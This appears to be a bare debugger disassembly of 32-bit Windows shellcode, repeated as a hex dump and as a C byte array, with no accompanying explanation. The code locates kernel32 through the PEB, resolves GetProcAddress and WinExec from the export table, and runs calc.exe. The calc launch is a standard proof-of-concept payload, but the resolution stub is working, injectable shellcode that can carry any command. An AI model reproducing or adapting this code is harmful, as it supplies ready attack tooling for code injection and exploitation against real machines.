00401000 > /64:A1 3000000>MOV EAX,DWORD PTR FS:[30]
00401006 . |8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
00401009 . |8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
0040100C . |8B00 MOV EAX,DWORD PTR DS:[EAX]
0040100E . |8B00 MOV EAX,DWORD PTR DS:[EAX]
00401010 . |8B40 18 MOV EAX,DWORD PTR DS:[EAX+18]
00401013 . |8BE8 MOV EBP,EAX
00401015 . |36:8B45 3C MOV EAX,DWORD PTR SS:[EBP+3C]
00401019 . |3E:8B5428 78 MOV EDX,DWORD PTR DS:[EAX+EBP+78]
0040101E . |03D5 ADD EDX,EBP
00401020 . |3E:8B4A 18 MOV ECX,DWORD PTR DS:[EDX+18]
00401024 . |3E:8B5A 20 MOV EBX,DWORD PTR DS:[EDX+20]
00401028 . |03DD ADD EBX,EBP
0040102A > |49 DEC ECX
0040102B . |3E:8B348B MOV ESI,DWORD PTR DS:[EBX+ECX*4]
0040102F . |03F5 ADD ESI,EBP
00401031 . |B8 47657450 MOV EAX,50746547
00401036 . |3E:3906 CMP DWORD PTR DS:[ESI],EAX
00401039 .^|75 EF JNZ SHORT ShellCod.0040102A
0040103B . |B8 726F6341 MOV EAX,41636F72
00401040 . |3E:3946 04 CMP DWORD PTR DS:[ESI+4],EAX
00401044 .^|75 E4 JNZ SHORT ShellCod.0040102A
00401046 . |3E:8B5A 24 MOV EBX,DWORD PTR DS:[EDX+24]
0040104A . |03DD ADD EBX,EBP
0040104C . |66:3E:8B0C4B MOV CX,WORD PTR DS:[EBX+ECX*2]
00401051 . |3E:8B5A 1C MOV EBX,DWORD PTR DS:[EDX+1C]
00401055 . |03DD ADD EBX,EBP
00401057 . |3E:8B048B MOV EAX,DWORD PTR DS:[EBX+ECX*4]
0040105B . |03C5 ADD EAX,EBP
0040105D . |8BD8 MOV EBX,EAX
0040105F . |6A 00 PUSH 0
00401061 . |68 78656300 PUSH 636578
00401066 . |68 57696E45 PUSH 456E6957
0040106B . |54 PUSH ESP
0040106C . |55 PUSH EBP
0040106D . |FFD3 CALL EBX
0040106F . |8BD8 MOV EBX,EAX
00401071 . |6A 00 PUSH 0
00401073 . |68 2E657865 PUSH 6578652E
00401078 . |68 63616C63 PUSH 636C6163
0040107D . |8D0424 LEA EAX,DWORD PTR SS:[ESP]
00401080 . |50 PUSH EAX
00401081 . |FFD3 CALL EBX
00401083 . |83C4 2C ADD ESP,2C
00401086 . |C9 LEAVE
64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 8B E8 36 8B 45 3C 3E 8B 54 28 78 03 D5
3E 8B 4A 18 3E 8B 5A 20 03 DD 49 3E 8B 34 8B 03 F5 B8 47 65 74 50 3E 39 06 75 EF B8 72 6F 63 41
3E 39 46 04 75 E4 3E 8B 5A 24 03 DD 66 3E 8B 0C 4B 3E 8B 5A 1C 03 DD 3E 8B 04 8B 03 C5 8B D8 6A
00 68 78 65 63 00 68 57 69 6E 45 54 55 FF D3 8B D8 6A 00 68 2E 65 78 65 68 63 61 6C 63 8D 04 24
50 FF D3 83 C4 2C C9
unsigned char Buffer[]={
0x64,0xa1,0x30,0x00,0x00,0x00,0x8b,0x40,0x0c,0x8b,0x40,0x0c,0x8b,0x00,0x8b,0x00,
0x8b,0x40,0x18,0x8b,0xe8,0x36,0x8b,0x45,0x3c,0x3e,0x8b,0x54,0x28,0x78,0x03,0xd5,
0x3e,0x8b,0x4a,0x18,0x3e,0x8b,0x5a,0x20,0x03,0xdd,0x49,0x3e,0x8b,0x34,0x8b,0x03,
0xf5,0xb8,0x47,0x65,0x74,0x50,0x3e,0x39,0x06,0x75,0xef,0xb8,0x72,0x6f,0x63,0x41,
0x3e,0x39,0x46,0x04,0x75,0xe4,0x3e,0x8b,0x5a,0x24,0x03,0xdd,0x66,0x3e,0x8b,0x0c,
0x4b,0x3e,0x8b,0x5a,0x1c,0x03,0xdd,0x3e,0x8b,0x04,0x8b,0x03,0xc5,0x8b,0xd8,0x6a,
0x00,0x68,0x78,0x65,0x63,0x00,0x68,0x57,0x69,0x6e,0x45,0x54,0x55,0xff,0xd3,0x8b,
0xd8,0x6a,0x00,0x68,0x2e,0x65,0x78,0x65,0x68,0x63,0x61,0x6c,0x63,0x8d,0x04,0x24,
0x50,0xff,0xd3,0x83,0xc4,0x2c,0xc9}
浙公网安备 33010602011771号